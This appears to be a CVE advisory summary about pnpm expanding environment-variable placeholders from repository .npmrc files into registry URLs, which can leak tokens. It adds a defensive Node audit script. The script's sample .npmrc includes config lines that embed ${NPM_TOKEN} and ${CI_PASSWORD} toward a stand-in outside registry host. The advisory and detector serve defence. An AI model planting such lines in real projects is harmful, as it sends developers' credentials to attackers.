Impact
pnpm, a popular JavaScript package manager, had a flaw in versions prior to 10.34.2 and 11.5.3 that allowed repository‑controlled configuration files (.npmrc and pnpm-workspace.yaml) to expand environment variable placeholders (${ENV_VAR}) straight into registry URLs and credentials. A repository owner could therefore embed the victim's environment secrets in a registry request and send them to an attacker‑chosen registry before any lifecycle scripts executed. This results in disclosure of potentially sensitive information, such as private tokens or credentials, making the vulnerability a medium‑severity information‑exposure flaw (CWE‑200, CWE‑201, CWE‑522).
Affected Systems
Systems running pnpm versions earlier than 10.34.2 or 11.5.3 are affected. The flaw exists in the pnpm package manager itself (vendor/product identifier pnpm:pnpm). Users of any pnpm-controlled workspace whose .npmrc or pnpm-workspace.yaml contains environment variable placeholders are potentially vulnerable unless the configuration is sanitized or the package manager is upgraded to a patched release.
Risk and Exploitability
The CVSS base score of 6.5 indicates moderate severity, and there is no EPSS score available; the vulnerability is not listed in CISA’s KEV catalog. Exploitation requires an attacker who can influence the repository’s configuration files, such as by hosting a malicious package or modifying a shared pnpm‑workspace.yaml. Because the environment variables are expanded before script execution, an attacker can intercept secrets during the dependency resolution phase. The risk is primarily that of covert data exfiltration rather than direct code execution, but given the potential for leaking credentials, the threat is significant for environments where sensitive secrets are used in .npmrc files.
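As an added example (not code from the pnpm project), the following Node script audits a repository's .npmrc before `pnpm install`, flagging the two patterns described above: `${VAR}` placeholders inside a registry URL, and placeholder-backed credentials scoped to a host outside a constructed allowlist. The allowlist, the sample file contents and the `.invalid` hosts are constructed for the demonstration; pnpm-workspace.yaml is not parsed here.

```javascript
// Added example, not pnpm project code: pre-install audit of a repo .npmrc.
const PLACEHOLDER = /\$\{[A-Za-z_][A-Za-z0-9_]*\}/;
const CRED_KEYS = ['_auth', '_authToken', '_password', 'username'];

// Parse .npmrc into key/value pairs, skipping blank and comment lines.
function parseNpmrc(text) {
  const entries = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#') || line.startsWith(';')) continue;
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    entries.push({ key: line.slice(0, eq).trim(), value: line.slice(eq + 1).trim() });
  }
  return entries;
}

// Host a value would be sent to: the //host/ prefix of a scoped credential
// key, or the registry URL's host (placeholders blanked so the URL parses).
function targetHost(key, value) {
  if (key.startsWith('//')) return key.slice(2).split(/[/:]/)[0];
  try { return new URL(value.replace(/\$\{[^}]*\}/g, 'x')).hostname; } catch { return null; }
}

// Returns findings; an empty array means nothing suspicious was seen.
function auditNpmrc(text, allowedHosts) {
  const findings = [];
  for (const { key, value } of parseNpmrc(text)) {
    const isRegistry = key === 'registry' || key.endsWith(':registry');
    const isCred = CRED_KEYS.some((k) => key === k || key.endsWith(':' + k));
    if (!isRegistry && !isCred) continue;
    const hasPlaceholder = PLACEHOLDER.test(value);
    const host = targetHost(key, value);
    if (isRegistry && hasPlaceholder)
      findings.push({ key, reason: 'env placeholder in registry URL' });
    if (isCred && hasPlaceholder && !allowedHosts.includes(host))
      findings.push({ key, reason: `credential ${host ? 'scoped to ' + host : 'unscoped'}` });
  }
  return findings;
}

// Constructed sample .npmrc: two benign lines, then the two risky patterns.
const SAMPLE_NPMRC = `
registry=https://registry.npmjs.org/
//registry.npmjs.org/:_authToken=\${NPM_TOKEN}
@internal:registry=https://\${NPM_TOKEN}@registry.example.invalid/
//registry.example.invalid/:_password=\${CI_PASSWORD}
`;
console.log(auditNpmrc(SAMPLE_NPMRC, ['registry.npmjs.org']));
```

In CI, run the audit against the checked-out repository and fail the job on any finding; a placeholder that legitimately belongs in a registry URL is then an explicit, reviewed exception rather than a silent default.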
OpenCVE Enrichment